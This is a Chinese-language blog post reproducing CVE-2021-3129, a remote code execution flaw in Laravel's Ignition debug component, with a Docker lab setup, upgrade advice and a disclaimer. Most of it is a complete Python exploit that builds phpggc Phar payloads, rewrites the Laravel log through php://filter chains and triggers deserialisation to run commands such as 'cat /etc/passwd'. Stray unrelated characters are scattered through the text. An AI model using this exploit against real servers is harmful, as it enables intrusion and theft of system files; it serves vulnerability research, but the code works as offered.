2021-01-29CVE-2021-3129-Laravel Debug mode 遠程代碼執(zhí)行漏洞

CVE-2021-3129-Laravel Debug mode 遠程代碼執(zhí)行漏洞

?

一训桶、漏洞簡介

Laravel是一套簡潔、開源的PHP Web開發(fā)框架谤专,旨在實現(xiàn)Web軟件的MVC架構午绳。

Laravel開啟了Debug模式時,由于Laravel自帶的Ignition 組件對file_get_contents()和file_put_contents()函數(shù)的不安全使用蜡坊,攻擊者可以通過發(fā)起惡意請求赎败,構造惡意Log文件等方式觸發(fā)Phar反序列化,最終造成遠程代碼執(zhí)行据忘。

二搞糕、影響版本

Laravel <= 8.4.2

Ignition <2.5.2

三、環(huán)境準備&漏洞復現(xiàn)

環(huán)境地址:

環(huán)境和exp下載:后臺回復 “CVE-2021-3129” 下載即可

或者下面下載:https://github.com/SNCKER/CVE-2021-3129

執(zhí)行

docker-compse up -d

訪問8888端口即可

訪問地址:http://127.0.0.1:8888

漏洞復現(xiàn):

1、在下載GitHub上下載的docker環(huán)境中帶有exp鲫忍,使用此exp需要下載phpggc

2悟民、把exp和phpggc放在同一目錄篷就,使用python3執(zhí)行exp,可以看到執(zhí)行了exp里命令

Macos執(zhí)行報錯

切換kali環(huán)境執(zhí)行命令:

修改腳本添加參數(shù):

環(huán)境和exp下載:后臺回復 “CVE-2021-3129” 下載即可

py腳本code

#!/usr/bin/python3

import requests as req

import os, uuid

class Exp:

? ? __gadget_chains = {

? ? ? ? "monolog_rce1": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce1 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",

? ? ? ? "monolog_rce2": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce2 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",

? ? ? ? "monolog_rce3": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce3 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",

? ? }? # phpggc鏈集合未辆,暫時添加rce1后續(xù)再添加其他增強通殺能力

? ? __delimiter_len = 8? # 定界符長度

? ? def __vul_check(self):

? ? ? ? resp = req.get(self.__url, verify=False)

? ? ? ? if resp.status_code != 405 and "laravel" not in resp.text:

? ? ? ? ? ? return False

? ? ? ? return True

? ? def __payload_send(self, payload):

? ? ? ? header = {

? ? ? ? ? ? "Accept": "application/json"

? ? ? ? }

? ? ? ? data = {

? ? ? ? ? ? "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",

? ? ? ? ? ? "parameters": {

? ? ? ? ? ? ? ? "variableName": "cve20213129",

? ? ? ? ? ? ? ? "viewFile": ""

? ? ? ? ? ? }

? ? ? ? }

? ? ? ? data["parameters"]["viewFile"] = payload

? ? ? ? resp = req.post(self.__url, headers=header, json=data, verify=False)

? ? ? ? # print(resp.text)

? ? ? ? return resp

? ? def __command_handler(self, command):

? ? ? ? """

? ? ? ? 因為用戶命令要注入到payload生成的命令中,為了防止影響結構兼蜈,所以進行一些處理。

? ? ? ? """

? ? ? ? self.__delimiter = str(uuid.uuid1())[:self.__delimiter_len]? # 定界符用于定位頁面中命令執(zhí)行結果的位置歼郭。

? ? ? ? # print(delimiter)

? ? ? ? command = "echo %s && %s && echo %s" % (self.__delimiter, command, self.__delimiter)

? ? ? ? # print(command)

? ? ? ? escaped_chars = [' ', '&', '|']? # 我只想到這么多辐棒,可自行添加。

? ? ? ? for c in escaped_chars:

? ? ? ? ? ? command = command.replace(c, '\\' + c)

? ? ? ? # print(command)

? ? ? ? return command

? ? def __clear_log(self):

? ? ? ? return self.__payload_send(

? ? ? ? ? ? "php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")

? ? def __gen_payload(self, gadget_chain):

? ? ? ? gen_shell = self.__gadget_chains[gadget_chain] % (self.__command)

? ? ? ? # print(gen_shell)

? ? ? ? os.system(gen_shell)

? ? ? ? with open('payload.txt', 'r') as f:

? ? ? ? ? ? payload = f.read().replace('\n', '') + 'a'? # 添加一個字符使得兩個完整的payload總是只有一個可以正常解碼

? ? ? ? os.system("rm payload.txt")

? ? ? ? # print(payload)

? ? ? ? return payload

? ? def __decode_log(self):

? ? ? ? return self.__payload_send(

? ? ? ? ? ? "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")

? ? def __unserialize_log(self):

? ? ? ? return self.__payload_send("phar://../storage/logs/laravel.log/test.txt")

? ? def __rce(self):

? ? ? ? text = self.__unserialize_log().text

? ? ? ? # print(text)

? ? ? ? echo_find = text.find(self.__delimiter)

? ? ? ? # print(echo_find)

? ? ? ? if echo_find >= 0:

? ? ? ? ? ? return text[echo_find + self.__delimiter_len + 1: text.find(self.__delimiter, echo_find + 1)]

? ? ? ? else:

? ? ? ? ? ? return "[-] RCE echo is not found."

? ? def exp(self):

? ? ? ? for gadget_chain in self.__gadget_chains.keys():

? ? ? ? ? ? print("[*] Try to use %s for exploitation." % (gadget_chain))

? ? ? ? ? ? self.__clear_log()

? ? ? ? ? ? self.__clear_log()

? ? ? ? ? ? self.__payload_send('a' * 2)

? ? ? ? ? ? self.__payload_send(self.__gen_payload(gadget_chain))

? ? ? ? ? ? self.__decode_log()

? ? ? ? ? ? print("[*] Result:")

? ? ? ? ? ? print(self.__rce())

? ? def __init__(self, target, command):

? ? ? ? self.target = target

? ? ? ? self.__url = req.compat.urljoin(target, "_ignition/execute-solution")

? ? ? ? self.__command = self.__command_handler(command)

? ? ? ? if not self.__vul_check():

? ? ? ? ? ? print("[-] [%s] is seems not vulnerable." % (self.target))

? ? ? ? ? ? print("[*] You can also call obj.exp() to force an attack.")

? ? ? ? else:

? ? ? ? ? ? self.exp()

def main():

? ? Exp("http://127.0.0.1:8888", "cat /etc/passwd")

if __name__ == '__main__':

? ? main()

四捷兰、安全建議

建議將 Laravel 框架升級至8.4.3及以上版本,或將 Ignition組件升級至 2.5.2 及以上版本秘蛇。

下載鏈接:

https://laravel.com/docs/8.x#laravel-the-fullstack-framework

參考:

https://mp.weixin.qq.com/s/ShRvF_YeV9JbJJnOUjklCw

https://github.com/SNCKER/CVE-2021-3129

https://www.venustech.com.cn/new_type/aqtg/20210114/22299.html

免責聲明:本站提供安全工具顶考、程序(方法)可能帶有攻擊性驹沿,僅供安全研究與教學之用,風險自負!

轉載聲明:著作權歸作者所有渊季。商業(yè)轉載請聯(lián)系作者獲得授權,非商業(yè)轉載請注明出處驯妄。

訂閱查看更多復現(xiàn)文章合砂、學習筆記

thelostworld

安全路上,與你并肩前行N⒉T狄佟!当悔!

?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 序言:七十年代末盲憎,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子饼疙,更是在濱河造成了極大的恐慌,老刑警劉巖屏积,帶你破解...
    沈念sama閱讀 211,348評論 6 491
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件磅甩,死亡現(xiàn)場離奇詭異卷要,居然都是意外死亡,警方通過查閱死者的電腦和手機僧叉,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,122評論 2 385
  • 文/潘曉璐 我一進店門瓶堕,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人郎笆,你說我怎么就攤上這事题画。” “怎么了苍息?”我有些...
    開封第一講書人閱讀 156,936評論 0 347
  • 文/不壞的土叔 我叫張陵竞思,是天一觀的道長。 經(jīng)常有香客問我盖喷,道長,這世上最難降的妖魔是什么距辆? 我笑而不...
    開封第一講書人閱讀 56,427評論 1 283
  • 正文 為了忘掉前任跨算,我火速辦了婚禮,結果婚禮上诸蚕,老公的妹妹穿的比我還像新娘。我一直安慰自己坏瘩,他們只是感情好漠魏,可當我...
    茶點故事閱讀 65,467評論 6 385
  • 文/花漫 我一把揭開白布蛉幸。 她就那樣靜靜地躺著丛晦,像睡著了一般。 火紅的嫁衣襯著肌膚如雪烫沙。 梳的紋絲不亂的頭發(fā)上锌蓄,一...
    開封第一講書人閱讀 49,785評論 1 290
  • 那天,我揣著相機與錄音您访,去河邊找鬼剪决。 笑死,一個胖子當著我的面吹牛柑潦,可吹牛的內容都是我干的。 我是一名探鬼主播览露,決...
    沈念sama閱讀 38,931評論 3 406
  • 文/蒼蘭香墨 我猛地睜開眼差牛,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了多糠?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 37,696評論 0 266
  • 序言:老撾萬榮一對情侶失蹤被盈,失蹤者是張志新(化名)和其女友劉穎只怎,沒想到半個月后怜俐,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 44,141評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡贴谎,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 36,483評論 2 327
  • 正文 我和宋清朗相戀三年季稳,在試婚紗的時候發(fā)現(xiàn)自己被綠了景鼠。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,625評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡溯香,死狀恐怖浓恶,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情包晰,我是刑警寧澤,帶...
    沈念sama閱讀 34,291評論 4 329
  • 正文 年R本政府宣布肠骆,位于F島的核電站蚀腿,受9級特大地震影響,放射性物質發(fā)生泄漏莉钙。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 39,892評論 3 312
  • 文/蒙蒙 一停忿、第九天 我趴在偏房一處隱蔽的房頂上張望蚊伞。 院中可真熱鬧,春花似錦颅停、人聲如沸掠拳。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,741評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽姐刁。三九已至,卻和暖如春龙填,著一層夾襖步出監(jiān)牢的瞬間拐叉,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,977評論 1 265
  • 我被黑心中介騙來泰國打工宿礁, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留梆靖,地道東北人。 一個月前我還...
    沈念sama閱讀 46,324評論 2 360
  • 正文 我出身青樓返吻,卻偏偏與公主長得像乎婿,于是被迫代替她去往敵國和親测僵。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 43,492評論 2 348

推薦閱讀更多精彩內容